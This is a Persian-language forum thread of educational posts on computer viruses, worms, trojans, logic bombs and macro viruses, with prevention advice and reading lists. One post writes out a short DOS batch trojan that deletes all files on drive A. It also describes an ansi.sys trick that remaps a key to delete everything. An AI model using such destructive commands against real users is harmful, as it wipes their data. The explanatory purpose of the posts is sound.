8- 7- ويروسهاي فايل
اين دسته از ويروس‌ها، فايل‌هاي باينري را آلوده مي‌سازند (فايل‌هاي اجرايي و كتابخانه‌اي پويا). ويروس‌هاي مذكور معمولاً داراي پسوندهاي dll, exe, com, sys مي‌باشند.

9. بعضي برنامه‌هايي كه با ويروس اشتباه گرفته مي‌شوند :
9- 1- كرم‌ها (worm):
برنامه كرم، برنامه‌اي است كه با كپي كردن خود، توليد و مثل مي‌كند. تفاوت اصلي ميان كرم و ويروس اين است كه كرم‌ها براي توليد و مثل نياز به برنامه‌ي ميزبان ندارد. كرم‌ها بدون استفاده از يك برنامه حامل به تمامي سطوح سيستم كامپيوتري «خزيده» و نفوذ مي‌كند.
كرم‌ها برنامه‌هايي هستند كه بدون اين‌كه برنامه‌هاي ديگر را آلوده كنند، تكثير مي‌يابند. بعضي از كرم‌ها، از طريق كپي كردن خود از ديسكي به ديسك ديگر گسترش مي‌يابند. آنها به دنبال نوع خاصي از فايل‌ها در ديسك‌ها و سرويس دهنده‌ها مي‌گردند و درصدد آسيب يا نابودي آنها برمي‌آيند. مثلاً مي‌توان به پاك كردن Registry توسط آنها اشاره كرد. بعضي از كرم‌ها در حافظه تكثير مي‌شوند و هزاران كپي از خود را به وجود مي‌آورند و همه آنها به‌طور همزمان، شروع به فعاليت مي‌كنند كه موجب پايين آمدن سرعت سيستم مي‌شوند.
كرم‌ها نيز مانند اسب‌هاي تروا ويروس نيستند، بنابراين بايد آنها را از كامپيوتر پاك كرد.
9- 2- ويروسهاي منطقي :
نوع ديگري ازبرنامه ها كه بنا به دلايلي مي توان آن را ويروس ناميد ويروس منطقي است. اين برنامه تنها برنامه هاي ميزبان خود را تغيير مي دهد بلكه آنها را سراسر پاك كرده وخود جايگزين آنها مي‌شود. اين كاررا با يك تغيير نام ساده مي توان انجام داد، مثلاً :
اگر A يك ويروس و B يك برنامه كار بر باشد، تغيير نام B به A باعث مي‌شود كه B ويروس به نظر برسد.
9- 3- اسب تروآ:
سابقه انگيزه اصلي اين نوع برنامه‌ها، حداقل به اندازه خود اسب ترواي اصلي است. عملكرد اين نوع برنامه‌ها هم ساده و هم خطرناك است؛ در حالي كه كاربر با تصاوير گرافيكي فوق‌العاده زيبا و شايد همراه با موسيقي مسحور گردانده شده است، برنامه بدون متوجه شدن كاربر، ديسك سخت را قالب‌بندي مي‌كند.
10. يافتن نويسنده ويروس:
يافتن نويسنده ويروس عملاً غير ممكن است يكي از بزرگترين خطرات برنامه‌هاي ويروس اين است كه احتمال يافتن فردي كه از ويروس براي اعمال غير قانوني استفاده مي‌كنند نسبتاً پايين است. اگر برنامه هاي ويروس در شبكه ها يا كامپيوترهاي بزرگ قرار داده شوند تعين منشاء برنامه عملاً غير ممكن است.
11. مبارزه با ويروس‌ها:
به‌طور كلي، به دو روش مي‌توان با ويروس‌ها مبارزه كرد:
1- جلوگيري از ورود ويروس‌ها به سيتسم
2- از بين بردن ويروس‌ها پس از ورود به سيستم


11-1 جلوگيري از ورود ويروس‌ها به سيستم:
براي اين كار، بايد به هنگام بهداشت را رعايت كرد. با اجراي دستورات زير مي‌توان به ميزان قابل توجهي از ورود ويروس‌ها به كار سيستم جلوگيري نمود:
• اگر كه لازم است، از ديسكت سالم خود در كامپيوتر ديگري كه به وجود ويروس در آن مشكوك هستيد، استفاده كنيد. ضروري است كه ابتدا آن را در مقابل نوشتن محافظت نموده تا اگر ويروسي در آن كامپيوتر قرار داشته باشد، به ديسكت شما منتقل نشود.
• نرم‌افزار خود را از منابع مطمئن تهيه نمود.
• از بكار بردن ديسكت مشكوك به ويروس جداً خودداري كنيد. اين ديسكت ممكن است به يك يا چند ويروس خطرناك آلوده باشد.
• در صورتي كه ديسكت جديدي خريداري شده است، براي اطمينان هرچه بيشتر، ابتدا آن را format نمود.
• از برنامه‌هاي ضدويروس كه در حافظه مقيم مي‌شوند، استفاده كنيد. اين نوع برنامه‌ها به محض اينكه ويروسي بخواهد به سيستم راه يابد، آن را كشف نموده و اجازه ورود به آن را نمي‌دهند. از جمله اين برنامه‌ها مي‌توان به RSAFE در DOSGUAERD در TOOLKIT در SCAN اشاره نمود.
• استفاده از اطلاعات ديسك‌هاي مشكوك را تا قبل از حضور اطمينان عدم وجود ويروس در آنها به حالت تعليق درآوريد.
• اگر در محل كار، چندين كامپيوتر وجود دارد، قبل از قراردادن ديسكت‌هاي ناشناخته در كامپيوتر يا كامپيوترهاي اصلي كه حاوي اطلاعات مهمي هستند. از چند كامپيوتر ديگر به عنوان قرنطينه استفاده كرد. بدين معني كه ديسكت‌هاي ناشناخته را مدتي بر روي كامپيوترهاي فوق آزمايش كرده و به كمك برنامه‌هاي ويروس‌ياب، مانند Scan, Toolkit از وجود يا عدم وجود ويروس‌هاي شناخته شده، اطلاع حاصل نموده و در صورت وجود ويروس، آنها را از طريق برنامه‌هاي ويروس‌كش پاك كنيد. اگر ويروس ناشناخته درون ديكست‌هاي مزبور وجود داشته باشد، توسط برنامه‌هاي ويروس‌كش آنها را نيز پاك كنيد.
اگر ويروس ناشناخته درون ديسكت‌هاي مزبور وجود داشته باشد، برنامه‌هاي ويروس‌كش قاعدتاً نمي‌توانند آنها را پيدا كنند. در چنين مواردي، بايد مدتي با ديسكت ناشناخته كار كرد تا اگر قرار است اختلالي رخ دهد، در كامپيوترهاي قرنطينه اتفاق بيافتد تا در كامپيوترهاي اصلي.
11-2 از بين بردن ويروس‌ها پس از ورود به سيستم
اگر علي‌رغم رعايت پيشگيري‌هاي لازم، چند ويروس به سيستم وارد شود، كار صورت گيرد:
كامپيوتر را خاموش كرده، سپس به كمك ديسكت سالم، مجدداً آن را راه‌اندازي كرد.
سيستم را توسط يك ويروس‌كش جديد، ويروس‌يابي كنيد و درصدد حذف تمام ويروس‌هايي كه به سيستم وارد شده‌اند، باشيد.

- نتيجه‌گيري
ويروسهاي برنامه هاي كوچك و گاه مخربي هستند كه قدرت تكثير فوق العاده اي دارند. با ورود به سيستم مشكلات زيادي را به سيستم مشكلات زيادي را به وجود مي آورد كه گاهي حمل اين مشكلات بسيار پر هزينه مي‌باشد همواره گفته مي‌شود كه پيشگيري مقدم بر درمان است افراد بايدتا جايي كه ممكن است سعي كند كه بيمار نشوند چون علاوه براينكه نمي توانند سلامت اوليه را بدست آوردن احتياج به هزينه نيز دارند كه اين مثل يك ويروس است تا جايي كه مي توانيد از ورود ويروس به كامپيوترها جلوگيري كنيد چون گاهي مشكلاتي به وجود مي‌آورد كه جبران آنها غير ممكن است .

فهرست منابع و ماخذ:

1- بورگر، ويروس‌هاي كامپيوتري بيماري تكنولوژي، مؤسسه تحقيقاتي و انتشاراتي نور، (9و10و20و21و40و41)،1370
2- واحد سميعي، ك، ويروس‌هاي كامپيوتري، انتشارات علم الكترونيك و كامپيوتر،
(5-8)، 1376


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:16 AM
ارسال: #27
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
- آشنايي با ویروس های مخرب و راههای مبارزه با آن
هنگامي كه در سال 1984 براي اولين بار در مقالات علمي، امكان وجود ويروس مطرح شد، هيچ كس آن را جدي نگرفت. اما طولي نكشيد كه اولين ويروس پا به عرصه وجود گذاشت. در آن زمان نيز عده انگشت شماري خطر آن را درك كردند. برخي حتي نمي دانستند كه آيا ويروس به طور اتفاقي رخ مي دهد يا آن را مي نويسند. يك يا دو متخصص، از اين حد نيز فراتر رفتند و توليد ويروس را كاملاً انكار كردند. اما امروزه، مي بينيم كه مراكز رايانه اي پر از ويروسهاي گوناگون است و تعداد آنها پي در پي افزايش مي يابد.
در سالهاي 1980، رايانه هاي بزرگ به صورت چند برنامه اي كار مي كردند. هر كاربر مي توانست برنامه هاي خود را به رايانه بسپارد و منتظر بماند تا اجرا و خروجي آن آماده شود. در بعداز ظهر يك روز جمعه، يك برنامه ساز برنامه الي را به عنوان بازرس اجرا كرد. كار برنامه آزمايش سيستم بود. بدين صورت كه اگر برنامه ديگري در حال اجرا است، آن را از سيستم حذف كند و در غير اين صورت، خود به صف ورودي برود و منتظر بماند. پس از اين كه برنامه بازرس تمام شد، برنامه ساز مي توانست كار اصلي خود را به سيستم بفرستد و بلافاصله خروجي را دريافت كند. زيرا بازرس تمام برنامه ها را از سيستم حذف كرده بود. متأسفانه، وجود يك اشكال كوچك در برنامه بازرس باعث شد كه برنامه پي در پي خود را تكثير و در صف وارد كند. درنتيجه، پس از چند ثانيه، هزاران نسخه از آن در صف ورودي توليد شد.
برحسب اين كه چه تعريفي براي ويروس ارايه مي دهيم، مي توانيم برنامه بازرس را يك ويروس رايانه اي بناميم. بنابراين، مي بينيم كه ويروس مسئله‌أي جديد نيست و توليد آن نيز مشكل نيست.
اولين ويروسها، تصاوير گرافيكي و يا پيغامهايي را بر روي صفحه نمايش نشان مي دادند. اما بيشتر ويروسهاي امروزي مخرب هستند. متأسفانه، ويروسهاي رايانه اي در ده سال اخير خسارات بي شماري را به سيستمهاي رايانه اي وارد ساخته اند. يكي از اين خسارات، از بين رفتن اطلاعات باارزش است. البته اين ضرر در مقابل وقت هزينه اي كه براي تهيه برنامه هاي ضد ويروس و نصب آنها مصرف مي شود، ناچيز است. حتي ويروسهاي بي خطري كه يك پيغام ساده نشان مي دهند، يا يك قطعه موسيقي كوتاه مي نوازند نيز وقت پردازنده و فضاي حافظه را براي تكثير مصرف مي كنند. به علاوه، براي كشف و پيشگيري از آنها بايد ضدويروس تهيه گردد. درنتيجه، آنها نيز باعث اتلاف وقت و هزينه مي شوند.
ويروس تنها برنامه رايانه اي مخرب نيست. بلكه برنامه هاي مخرب نيز وجود دارد. از آن جمله، اسب تروا،‌‌‌ بمب منطقي و كرم را مي توان نام برد.

اسب تروا: اسب تروا، برنامه اي است كه كارهايي را انجام مي دهد كه در مستنداتش ذكر نشده است. معمولاً اين كارها زيان آور نيز هستند. براي مثال، هنگامي كه كاربر مي خواهد و با سيستم كار كند، يك برنامه Login تقلبي، شماره حساب و كلمه عبور را از كاربر گرفته تا اجازه ورود به سيستم و كار با آن را صادر نمايد. اما پس از فهميدن شماره حساب و كلمه عبور، اطلاعات كاربر را دستكاري مي كند. به عنوان مثالي ديگر، فرض كنيد برنامه اي وجود دارد كه بايد فشرده سازي اطلاعات را انجام دهد. اما در حقيقت، هر پرونده اي را كه به آن اعلام مي كنند، از روي ديسك حذف مي كند. نمونه اي از يك اسب تروا در شكل 1-4 نشان داده شده است.
a:
copy CON a:horse.bat
y
cls
del <a:horse.bat a:\*.*
[Ctrl]-z
شكل 1-4- يك نمونه اسب تروا
اگر پرونده horse.bat را با توجه به شكل 1-4 توليد كنيم و شخص علاقه‌مندي از روي كنجكاوي فرمان horse را اجرا نمايد، تمام پرونده هاي موجود در ديسك A حذف خواهند شد.
معمولاً برنامه اسب بايد به طور خودكار اجرا شود و به سيستم آسيب برساند. براي مثال، يك فرمان type آن را فعال كند. فرض كنيد در پرونده‌اي از فرمانهاي ansi.sys استفاده كنيم و يكي از كليدهاي صفحه را با فرمان پاك كردن تمام پرونده هاي ديسك و كليد N را با Y عوض كنيم. اگر شخص كنجكاوي داخل پرونده را با فرمان type ببيند، از آن پس، هرگاه كليد مورد نظر تحرير شود، سيستم پيغام Warning all data will be deleted (Y/N) را صادر مي كند كه با تحرير كليد N تمام پرونده ها حذف خواهند شد.
- بمب منطقي:
بمب منطقي، برنامه اي است كه براي خسارت زدن به سيستم، از يك دستور IF استفاده مي كند. اگر شرايط مناسب باشد، يك كار زيان آور انجام مي دهد، در غير اين صورت خير. شرط مي تواند زمان انجام خسارت، اسم يك فرد و يا هر عبارت ديگري باشد. براي مثال، يك برنامه ساز بمبي را در يك سيستم حسابداري نصب كرده بود كه پرونده اضافه كاري را براي نام برنامه ساز جستجو نمايد. اگر نام برنامه ساز وجود نداشت، پرونده حذف مي شد. در غير اين صورت، پرونده در سيستم باقي مي ماند. الگوريتم كار بمب منطقي در 2-4 نشان داده شده است.

كرم و ويروس
- كرم:
كرم برنامه اي رايانه اي است كه علاوه بر اثرات جانبي، خود را نيز تكثير مي كند و براي تكثير نيازي به يك برنامه ناقل ندارد. كرمها بيشتر در شبكه هاي رايانه اي وجود دارند. درخت كريسمس نمونه اي از برنامه كرم است. اين برنامه هنگامي كه اجرا مي شود، يك درخت كريسمس مانند شكل 4-3 روي صفحه نمايش مي دهد و همزمان خود را نيز روي شبكه منتشر مي كند.
- ويروس: ويروس برنامه اي با ويژگيهاي زير است:
داراي اثرات جانبي است: ويروس، حاوي قطعه برنامه الي است كه داراي اثرات جانبي زيان آور مي باشد و در شرايط مناسب اثراتش را نشان مي دهد. البته ويروسهايي هستند كه تخريب كننده نيستند.
خودتكثير است: ويروس خود را تكثير مي كند و بر روي ديسك منتشر مي شود. اين همان خاصيت ويروسهاي بيولوژيكي است. خودتكثيري، يكي از مشخصه هاي ويروس است كه آن را از ساير برنامه ها متمايز مي كند.
مخفي است: موفقيت ويروس در اين است كه قبل از مشخص شدن اثرات جانبي آن، خود را به طور مخفيانه تكثير مي كند. اين ويژگي ويروس نيز مانند ويروسهاي بيولوژيكي است. ويروس بيولوژيكي نيز در دوران نهفتگي نشانه‌اي ندارد، اما به بقيه انسانها سرايت مي كند. چون نشانه اي از خود ظاهر نمي كند، هيچ دليلي ندارد كه افراد از ناقل كناره گيري كنند و همين امر سبب انتشار بيشتر ويروس مي شود.
معمولاً ويروسها همراه برنامه هاي مخرب ديگر به رايانه حمله مي كنند. براي مثال، بعضي از آنها از مكانيسم بمب منطقي استفاده مي كنند و در شرايط خاصي داراي اثرات جانبي هستند. ويروس armagid نمونه اي از اين گونه ويروسهاست كه در روز هشتم ماه مه هر سال فعال مي شود و شكل مكان نما را به صورت دو خط متقاطع و به رنگ قرمز تبديل مي كند.
بعضي از افراد بر اين عقيده هستند كه ويروس رايانه اي نيز نوعي فناوري است و مانند بقيه نه خوب است و نه بد. قصد و نيت افراد بستگي دارد كه از آنها در امور خوب يا بد، استفاده كنند. براي مثال، مي توان ويروسي نوشت كه در شبكه حركت و پرونده هاي بي مصرف را از روي ديسك حذف نمايد. و يا ويروسهايي طراح شود كه در سيستم حركت كنند. چنانچه سيستم فاقد ضد ويروس باشد و يا ضد ويروس قديمي باشد، نگارش جديد را جايگزين آن نمايند. همچنين، مي توانيم ويروسي بنويسيم كه خود را به پرونده متصل نموده، اطلاعات آن را فشرده كند. سپس هنگام استفاده از پرونده، آن را از فشردگي خارج سازد.
تمام كساني كه تا كنون خواسته اند ويروس مفيد بنويسند، ناموفق بوده اند. زيرا به دليل كنترل ناپذيري ويروس، اگر اشكالي در ويروسهاي مفيد بروز نمايد، رفع آن ناممكن مي شود. به علاوه، چون ويروس مخفي است، بدون اجازه وارد سيستمهاي مختلف مي شود كه اين امر كار صحيحي نيست. سرانجام، ضدويروسها، تفاوت بين ويروسهاي خوب و بد را نمي توانند تشخيص دهند و در صورت تشخيص نيز ويروسهاي بد زير چتر ويروسهاي خوب وارد سيستم خواهند شد.

- اثرات جانبي ويروس
ويروس معمولاً كارهايي انجام مي‌دهد كه يك برنامه معمولي انجام نمي دهد. براي مثال، يك يا چند كار زير را ممكن است انجام دهد.
1-اطلاعات غلط را برروي پرونده ها بنويسيد.
2-اطلاعات داخل پرونده را جابه جا كند.
3-اطلاعات پرونده هاي مختلف را با يكديگر تعويض كند.
4-اطلاعات پرونده ها را به رمز درآورد.
5-اطلاعات يك پرونده را به پرونده ديگر اضافه كند.
6-قطاعهاي خالي ديسك را با علامت خراب پر كند.
7-جدول تخصيص پرونده ها را پاك كند.
8-ركورد بوت را خراب كند.
9-ديسك را فرمت كند.
10-قسمتي از حافظه اصلي را اشغال كند.
11-برنامه هاي در حال اجرا را تغيير دهد.
12-سرعت اجراي برنامه ها را كم كند.
13-پيغامها و تصاويري را برروي صفحه نمايش نشان دهد.
14-پيغامها و شكلهايي را برروي صفحه چاپگر نشان دهد.
15-كليدها را تغيير دهد.
16-صفحه كليد را قفل كند.
17-سيستم را به حالت تعليق درآورد.
18-سيستم را دوباره راه اندازي كند.

انتشار ويروس و هدفهاي آن
ويروس از طريق پرونده هاي آلوده، منتشر مي شود. هنگام اجراي برنامه‌هاي آلوده و يا پردازش پرونده هاي آلوده، ويروس فعال مي شود و خود را تكثير مي‌كند. اگر رايانه را خاموش كنيم، فعاليتش متوقف مي شود. فرض كنيد، رايانه داراي يك دستگاه ديسك گردان سخت و يك دستگاه ديسك گردان نرم است. همچنين، يك ويروس بر روي ركورد بوت يك ديسك نرم وجود دارد. اگر رايانه را با آن ديسك راه اندازي كنيم، ابتدا ويروس به حافظه اصلي منتقل و سپس فعال مي شود. آنگاه ديسك سخت را آلوده مي كند. اگر رايانه را خاموش كنيم، ويروس موجود در حافظه اصلي از بين مي رود، اما در ديسك سخت باقي مي ماند.
سيستم را بار ديگر با ديسك سخت راه اندازي مي كنيم. ويروس از ديسكم سخت به حافظه رفته، فعال مي شود. اكنون اگر از يك ديسك نرم سالم و بدون محافظ نوشتن استفاده كنيم، ويروس در ديسك نرم هم منتشر مي شود. اگر رايانه را خاموش كنيم، ديسك سخت و نرم هر دو آلوده خواهند بود. به شكل 4-4 توجه كنيد.
هدفهاي ويروس
ويروس در مكانهايي منتشر مي شود و آنها را آلوده مي كند كه اجرايي و تغييرپذير باشند. بنابراين، فضاي سيستم (ركورد بوت، جدول تخصيص پرونده ها، راهنما و جدول افراز) پرونده هاي exe، com، bat، sys ازجمله هدفهاي ويروس به شمار مي روند. ويروسهاي امروزي پرونده هاي اطلاعاتي را نيز خراب مي كنند. به پرونده هايي كه واژه پردازها توليد و پردازش مي نمايند «سند» مي گويند. سندها از منابع بسيار مناسب براي انتقال ويروس هستند.
ممكن است اين سؤال مطرح شود كه آيا ويروس، سخت افزار را هم تخريب مي كند. پاسخ اين سؤال تا چند سال قبل منفي بود. زيرا اين عقيده وجود داشت كه سخت افزار در مقابل آسيب نرم افزار مقاوم است. اما ويروس چرنوبيل كه به سخت افزار نيز حمله مي كند و به آن آسيب مي رساند، اين نظريه را رد مي كند.

:
-انواع ويروس
كار تخريب و تكثير ويروسها و همچنين مكان جايگيري آنها با يكديگر متفاوت است. برخي ويروسها، محتواي ركورد بوت، سيستم عامل و يا جدول افراز ديسك هاي موجود را تغيير مي دهند. درنتيجه، ممكن است سرعت عمل راه اندازي سيستم (بوت شدن سيستم) را نيز آهسته تر نمايد. برخي ديگر به پرونده هاي اجرايي متصل شده آنها را آلوده مي كنند. گاهي نيز مانند ويروس Crypto به انواع پرونده هاي سيستم و غير سيستم حمله مي كنند و در آنها منتشر مي شوند. بنابراين، احتمال آلوده سازي آنها بيشتر از ويروسهاي ديگر است.
برخي از ويروسها ماكرو هستند و برخي ديگر خير. سندهايي كه به كمك واژه پردازها توليد مي شوند، مكانهاي خوبي براي انتقال ويروس به شمار مي روند. زيرا بيشتر سندها، صرفاً حاوي اطلاعاتي نيستند كه برروي صفحه نمايش، چاپگر يا هر دستگاه خروجي ديگر مي بينيم. بلكه اطلاعات ديگري نيز همراه آنها وجود دارد. براي مثال، يك مقاله چند صفحه اي را از طريق يك واژه پرداز توليد مي كنيم، مي خواهيم دو خط اطلاعات در صفحه اول نشان داده شود. اكنون اين سؤال مطرح مي شود كه آيا واژه پرداز بايد چندين خط خالي ديگر توليد كند تا به صفحه بعد برود؟ پاسخ منفي است. واژه پرداز به جاي چند خط خالي، فرمانهايي به پرونده اضافه مي كند تا هنگام چاپ مقاله، خطوط خالي را توليد نمايند. براي حاشيه بندي نيز به همين روش عمل مي كند. يعني، فرمانهايي براي حاشيه بندي اضافه مي كند. به اين فرمانها «ماكرو» مي گويند. نرم افزارهاي كاربردي بي شماري وجود دارند كه از ماكرو استفاده مي كنند. براي مثال، واژه پرداز Word و صفحه پرداز Excel دو نمونه از آنها هستند.
در سالهاي اخير، ويروسهايي به نام ماكرو نوشته شده اند كه خود را مانند ماكرو به سند متصل مي كنند. هنگامي كه برنامه، سندي را باز مي كند تا كاري انجام دهد، ويروس خود را از سند به برنامه و سپس به مكانهاي ديگر رسانده، آنها را آلوده مي سازند.
مي دانيم اگر دو برنامه با يك اسم يكسان و پسوندهاي متفاوت com و exe در ديسك وجود داشته باشد و به سيستم عامل بگوييم برنامه اجرا شود، سيستم، برنامه با پسوند com را اجرا مي كند. برخي از ويروسها از اين خصوصيت استفاده مي كنند. يعني، ديسك را براي پرونده هاي exe جستجو نموده، با مشاهده هر يك از اين گونه پرونده ها، يك نسخه از خود را تكثير و با همان اسم، اما پسوند com و مشخصه مخفي روي ديسك ذخيره مي نمايد.
براي مثال، اگر پرونده اي با نام Prog.exe داشته باشيم، ويروس خود را با نام Prog.com تكثير مي كند.
برخي از ويروسها خود را تكثير نمي كنند، اما نشاني تمام پرونده هاي اجرايي را تغيير مي دهند. بدين صورت كه آدرس خود را در فهرست راهنما در محل نشاني پرونده مي نويسند. بنابراين، هر برنامه اي را كه مي خواهيم اجرا كنيم، چون داراي نشاني ويروس است، ويروس اجرا مي شود.

ويروس در هنگام اجرا و مبارزه با آن
هنگامي كه كنترل اجرا به يك ويروس داده مي شود، ممكن است در حافظه مقيم شود و هرگاه كه برنامه اي براي اجرا وارد حافظه مي شود و يا يك دستيابي به ديسك صورت مي گيرد، ويروس فعال شده، آن برنامه يا ديسك را آلوده مي كند. برخي از ويروسهاي مقيم، با راه اندازي گرم (تحرير كليدهاي (Ctrl]-[Alt]-Del] نيز از حافظه خارج نمي شوند.
ويروس مي تواند به صورت غير مقيم هم فعاليت كند. هنگامي كه احضار شد، اجرا شود و سپس از حافظه اصلي بيرون برود. بعضي از ويروسها دورگه هستند. يعني، قسمتي از آنها در حافظه مقيم مي شود و قسمت ديگر غيرمقيم است.
مبارزه با ويروس
بسياري از كاربران نسبت به ويروس و پيامدهاي آن بي توجه هستند. متأسفانه همين امر باعث شده است كه ويروسهاي خطرناكي در سيستمهاي مختلف منتشر گردند. ضرورتي ندارد كه يك كارشناس باتجربه باشيم و يا به طور كامل برنامه هاي مخرب و تفاوت آنها را بشناسيم تا با ويروس مبارزه كنيم. آنچه بايد بدانيم اين است كه براي مبارزه با ويروس پنج مرحله آماده سازي، پيشگيري، كشف، مقاومت و ترميم وجود دارد.

كتابشناسي
کد:
1-    Batchev, Vesselin: Methodology of computer Ani-Virus research: PHD Tesis
2-    Burger, R: Computer Viruses and data protection, Abacus, 1991.
3-    Cohen,F:A short course on computer viruses, ASP press, 1991.
4-    Febrache,D:A pathology of computer viruses, Springer-Verlag, 1992
5-    Fites, P; Johnstion, P.Krat,M:the computer Virus Crisis, VanNostr and Reinhold, 1992.
6-    Hoffman, L: Viruses, Worms and trijan horses, Van Nostr and Reinhold, 1990
7-    Solmon, A: PC Viruses, detection, analysis and vure, Springer-Verlag, 1991.
8-    Anti-Virus information for IBM compaitible computers: Virus Vultin, 1999.
9-    Network association, inc, MCAfee Virusscan, 1998.
10-    Symantec antivirus research center, virus information, 1995-1999.
11-    Thomas Jefferson University virus page.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:17 AM
ارسال: #28
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
ضرورت واهمیت تحقیق
چون اکثر کامپیوترها با مشکل ویروس مواجه هستند و در این زمینه تحقیقی صورت نگرفته اهمیت و ضرورت دارد که این تحقیق صورت گرفته تا مشکل ویروسها را با راه حلهای پیشنهادی حل کنیم .
انواع مختلف برنامه های مخرب عبارتند از :
1- E-Mailvirus 2- MACRO VIRUS
3- اسب ترواسه 4- کرمها WORM
5- ویروس های بوت سکتورو پارتیشن 6- HOAX – گول زنگ ها
7- CELLSAVER یک اسب تروا
8- ویروس های چند جزیی Multipartite Virus

ویروس ها می توانند گسترش یابند ولی قادر نیسند به سخت افزار کامپیوتر صدمه ای وارد کنند. برای جلوگیری از آلوده شدن سیستم قدم اول آن است که نرم افزار آنتی ویروس را به همراه کلیه امکاناتش بر روی سیستم نصب کرده و سعی کنید آن را به روز نگه دارید.
قدم دوم سعی شود بیشتر نرم افزارهای آنتی ویروس را محک زده و مطمئن ترین آنها را برگزینید.
برای آمادگی جهت مقابله با نفوذ ویروس ها باید به نکات زیر توجه کرد.
1- از یک کمپانی مشهور و شناخته شده بر روی سیستم تان یک نرم افزار آنتی ویروس نصب کرده و همیشه آن را به روز نگه دارید.
2- یک برنامه آنتی ویروس که چند ماه به روز نشده نمی تواند در مقابل جریان ویروس ها مقابله کند.
3- برای آنکه سیستم امنیتی کامپیوتر از نظم و سازماندهی برخوردار باشد برنامه a.v (آنتی ویروس) خود را سازماندهی نمایئد.
4- برنامه های آنتی ویروس دریافتن برنامه های اسب تروا خیلی خوب عمل نمی کنند از این رو، در باز کردن فایل های باینری و فایل های برنامه های excel و word که از منابع ناشناخته و احیاناً مشکوک می باشند محتاط عمل کنید.
5- از باز کردن فایل هایی که از طریق چت برایتان فرستاده می شوند پرهیز کنید.
6- اگر احتمالاً بر روی هارد دیسک خود اطلاعات مهمی دارید حتماً از همه آنها نسخه پشتیبان تهیه کنید.
کرم ها برنامه های کوچکی هستند که با رفتاری بسیار موذیانه به درون سیستم رسوخ کرده بدون واسطه خود را تکثیر کرده و خیلی زود سراسر سیستم را فرا می گیرند.
با رعایت نکاتی می توان از ورود کرم ها به سیتم جلوگیری کرد که در متن اصلی به طور کامل این نکات بیان شده است.
به عنوان مثال Codered یک نوع کرم اینترنتی است.
Slapper یک کرم شبکه است.
کرم Blaster : هدف اصلی این کرم اینترنتی ضربه زدن به مایکروسافت و سایت اینترنتی Windows up date.com این کمپانی می باشد.
Blaster – a 32w یک نوع کرم اینترنتی است. سیستم عامل هایی که در معرض هجوم این کرم هستند عبارتند از : 4’windowsnt
Terminal Services edition 4’ . windows nt
2000 windows
Windows XP
2003 Windows server

مقدمه
ویروس کامپیوتری چیست ؟
ویروس کامپیوتربرنامه ای است که می تواند نسخه های اجرایی خود را دربرنامه های دیگرقراردهد.هربرنامه آلوده می تواند به نوبه خود نسخه های دیگری ازویروس رادربرنامه های دیگرقرار دهد.
برنامه ای را برنامه ویروس می نامیم که همه ویژگیهای زیررادارا باشد:
1) تغییرنرم افزارهایی که به برنامه ویروس متعلق نیستند با چسباندن قسمتهایی ازاین برنامه به برنامه های دیگر.
2) قابلیت تشخیص این نکته که برنامه قبلا دچارتغییر شده است یا خیر.
3) قابلیت انجام تغییردربعضی ازبرنامه ها.
4) قابلیت جلوگیری ازتغییربیشتر یک برنامه درصورت تغییراتی درآن به واسطه ی ویروس.
5) نرم افزارهای تغییر یافته ویژگیهای 1 الی 4 را دارا هستند. اگربرنامه ای فاقد یک یا
چند ویژگی ازویژگیهای فوق باشد نمی توان به طورقاطع آنرا ویروس نامید.
آشنایی با انواع مختلف برنامه های مخرب
E-mail virus
ویروسهایی که ازطریق E-mail وارد سیستم میشوندطبق معمول به صورت مخفیانه
درون یک فایل ضمیمه شده قراردارند که با گشودن یک صفحه ی htmlیا یک فایل قابل اجرای برنامه ای ( یک فایل کد شده قابل اجرا) ویا یک word document می توانند فعال شوند.
MARCO VIRUS
این نوع ویروسها معمولا به شکل ما کرو در فایلهایی قرارمی گیرند که حاوی صفحات
متنی ( word document ) نظیرفایلهای برنامه های ms office همچون word و
Excel هستند.
توضیح ماکرو: نرم افزارهایی مانند word Microsoft و Excel این امکان را برای
کاربربوجود می آورند که درصفحه متن خود ماکرویی ایجاد نماید‘ این ماکروحاوی یکسری دستورالمعل ها عملیات ویا keystroke ها است که تمام اینها توسط خوده کاربرتعیین میگردند.
ماکرو ویروسها معمولا طوری تنظیم شده اند که به راحتی خود رادرهمه صفحات متنی
ساخته شده با همان نرم افزار ms word ‘ Excel جای می دهند.
اسب تروآ
این برنامه حداقل به اندازه خود اسب تروآی اصلی قدمت دارد. عملکرد این برنامه ها ساده ودرعین حال خطرناک است.
درحالیکه کاربرمتوجه نیست وبا تصاویرگرافیکی زیبا وشاهد همراه با موسیقی محسور
شده برنامه عملیات مخرب خود را آغازمی کند.
